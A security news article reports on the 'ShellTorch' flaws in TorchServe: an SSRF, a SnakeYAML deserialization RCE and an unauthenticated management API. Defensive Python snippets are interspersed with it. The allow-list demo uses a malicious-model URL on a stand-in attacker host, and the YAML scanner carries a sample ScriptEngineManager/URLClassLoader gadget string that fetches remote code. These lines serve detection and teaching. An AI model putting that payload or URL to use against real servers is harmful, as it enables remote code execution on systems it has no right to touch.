Critical 'ShellTorch' Flaws Light Up Open Source AI Users, Like Google

The vulnerabilities exist in the widely used TorchServe framework, used by Amazon, Google, Walmart, and many other heavy hitters.

A newly discovered set of critical vulnerabilities in a machine learning framework known as TorchServe could give cyberattackers a way to completely subvert artificial intelligence (AI) models for a range of bad outcomes. The bugs show that AI applications are as susceptible to open source bugs as any other application, researchers noted. They affect Amazon's and Google's machine learning services, among many others.

TorchServe is an open source framework maintained by Amazon and Meta, used for deploying deep-learning models based on the PyTorch open source machine learning library into production environments. It's used by many large companies; commercial users of TorchServe include Walmart, Amazon, Microsoft Azure, Google Cloud, and others.

Successful exploitation of the vulnerabilities could let threat actors access proprietary data in AI models, insert malicious models into production environments, alter a machine learning model's results, and take complete control of servers.

Thousands of Targets: Bugs See Wide Exposure

Thousands of vulnerable instances of the software are publicly exposed on the Internet and open to unauthorized access and a range of other malicious actions, according to researchers at Oligo who discovered the vulnerabilities.

"TorchServe is among the most popular model-serving frameworks for PyTorch," Oligo researchers Idan Levcovich, Guy Kaplan, and Gal Elbaz wrote in a blog post this week. "Using a simple IP scanner, we were able to find tens of thousands of IP addresses that are currently completely exposed to the attack — including many belonging to Fortune 500 organizations."

All versions of TorchServe up to and including 0.8.1 are vulnerable. Oligo reported the vulnerabilities to PyTorch, which addressed the flaws in TorchServe version 0.8.2. "The update from Oct. 3 dramatically reduced the exposure, and therefore we recommend all users upgrade to the latest version," says Elbaz, co-founder and CTO at Oligo.
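The version boundary described above (0.8.1 and earlier affected, 0.8.2 fixed) can be checked mechanically. The following is a minimal sketch, not an official tool; the function names `parse_version` and `is_shelltorch_affected` are hypothetical, and it assumes plain dotted version strings.

```python
import re

# Last affected release according to the article; 0.8.2 carries the fixes.
LAST_VULNERABLE = (0, 8, 1)


def parse_version(text):
    """Turn a version string such as '0.8.1' into a tuple of ints (0, 8, 1)."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if match is None:
        raise ValueError(f"unrecognized version string: {text!r}")
    # A missing patch component (e.g. '0.9') is treated as 0.
    return tuple(int(part or 0) for part in match.groups())


def is_shelltorch_affected(version_text):
    """Return True when the version is 0.8.1 or earlier."""
    return parse_version(version_text) <= LAST_VULNERABLE
```

On a host where TorchServe was installed from PyPI, the input string could plausibly come from `importlib.metadata.version("torchserve")`, though how a given deployment reports its version is an assumption to verify locally.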

The ShellTorch Flaws

Oligo has collectively dubbed the vulnerabilities "ShellTorch." Two of them are rated as critical with a near-maximum severity rating on the CVSS scale: CVE-2023-43654, a server-side request forgery (SSRF) vulnerability that enables remote code execution (RCE); and CVE-2022-1471, a Java deserialization RCE.

The third ShellTorch vulnerability stems from how TorchServe by default exposes a critical management API to the Internet. Though changing the configuration from default mitigates the issue, many organizations and projects based on TorchServe have used the default configuration.

"As a result, the vulnerability is also present in Amazon’s and Google’s proprietary Docker images by default, and are present in self-managed services of the largest providers of machine learning services," according to Oligo. "This includes self-managed Amazon AWS SageMaker, self-managed Google Vertex AI, and several other projects built on TorchServe. The misconfiguration is particularly problematic because accessing the management interface requires no authentication at all, so anyone can access it."

"Correctly configuring the management interface does close the major attack vector, but ShellTorch can be exploited via additional vectors," Elbaz says.
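To make the misconfiguration concrete, here is a rough sketch of a check that reads the text of a TorchServe `config.properties` file and reports whether the management API is bound to something other than loopback. `management_address` is the TorchServe setting for this interface; the helper names and the loopback list are illustrative assumptions, and the sketch deliberately returns `None` when the key is absent because the effective default depends on the version and image in use.

```python
from urllib.parse import urlsplit

# Hosts treated as "local only" in this sketch (an assumption, not a TorchServe list).
LOOPBACK_HOSTS = {"127.0.0.1", "localhost", "::1"}


def parse_properties(text):
    """Parse simple key=value lines, skipping blank lines and # comments."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        props[key.strip()] = value.strip()
    return props


def management_api_exposed(config_text):
    """Return True if management_address binds beyond loopback, False if it
    is loopback-only, and None if the key is not set at all."""
    address = parse_properties(config_text).get("management_address")
    if address is None:
        return None
    host = urlsplit(address).hostname
    return host not in LOOPBACK_HOSTS
```

A `True` result only says the interface listens on a non-loopback address; whether it is reachable from the Internet still depends on firewalls, container port mappings, and network layout.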

Server-Side Request Forgery Flaw

One of these vectors has to do with CVE-2023-43654, the SSRF flaw that the company discovered. The flaw is tied to a TorchServe API for fetching a machine learning model's configuration files. Oligo found that while the API contained logic for fetching configuration files from only an allowed list of URLs, by default it accepted any and all domains as valid URLs. An attacker could use the flaw to upload a malicious model into a production environment, resulting in arbitrary code execution. When combined with the default configuration error, CVE-2023-43654 allows an unauthenticated attacker to execute arbitrary code in PyTorch environments, Oligo found.
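The gap between having allow-list logic and having an effective allow list can be illustrated with a short sketch. This is not TorchServe's code: `is_url_allowed` is a hypothetical helper, the permissive patterns are an assumption modeled on an accept-everything default, and `models.example.com` is a placeholder host.

```python
import re


def is_url_allowed(url, allowed_patterns):
    """Return True if the URL fully matches any allow-list regex."""
    return any(re.fullmatch(pattern, url) for pattern in allowed_patterns)


# Assumed accept-everything default: the check exists but filters nothing.
PERMISSIVE = [r"file://.*", r"http(s)?://.*"]

# Hypothetical tightened list: only one trusted model host is accepted.
RESTRICTED = [r"https://models\.example\.com/.*"]

attacker_url = "http://attacker.example/evil.mar"
print(is_url_allowed(attacker_url, PERMISSIVE))   # the permissive list lets it through
print(is_url_allowed(attacker_url, RESTRICTED))   # the restricted list rejects it
```

Using a full match with an escaped host and a trailing slash is a deliberate choice in this sketch, since a loose prefix or substring match would also accept look-alike hosts such as `models.example.com.evil.net`.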

CVE-2022-1471 is an RCE vulnerability in SnakeYaml, a widely used open source library that TorchServe uses. Oligo researchers found that by uploading an ML model with a malicious YAML file, they could trigger an attack that resulted in RCE on the underlying server.
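Malicious YAML of this kind typically relies on explicit type tags that ask the parser to instantiate arbitrary Java classes. As a rough triage aid only, and not a substitute for upgrading, the sketch below flags such tags in a YAML file. The function name is hypothetical, the sample payload shape and host are illustrative, and a plain regex like this can both miss obfuscated input and flag harmless text inside strings.

```python
import re

# Matches tags like !!javax.script.ScriptEngineManager (dotted class names).
# Standard YAML tags such as !!str or !!int contain no dot and are ignored.
JAVA_TYPE_TAG = re.compile(r"!!([A-Za-z_][\w$]*(?:\.[A-Za-z_][\w$]*)+)")


def find_java_type_tags(yaml_text):
    """Return the dotted class names referenced by explicit !! tags."""
    return JAVA_TYPE_TAG.findall(yaml_text)


suspicious = (
    "handler: !!javax.script.ScriptEngineManager "
    '[!!java.net.URLClassLoader [[!!java.net.URL ["http://attacker.example/"]]]]'
)
benign = "batchSize: !!int 4\nname: resnet"

print(find_java_type_tags(suspicious))
print(find_java_type_tags(benign))
```

Any non-empty result in a model's YAML configuration would be a reason to inspect the file by hand before loading it.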

The vulnerabilities show that AI applications face the same risks from open source code as all other applications, Elbaz says. But with AI, the consequences are even greater given the myriad use cases for large language models and other AI technologies. Vulnerabilities such as ShellTorch give attackers a way to corrupt AI models in order to generate misleading answers and create other havoc.

"AI is a giant step forward for technology, and with these benefits come new risks — huge potential with huge risks," Elbaz says. "There are new types of risks that we have never really seen before, so we need to be ready to evolve in order to protect AI infrastructure."

About the Author(s)

Jai Vijayan, Contributing Writer

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.
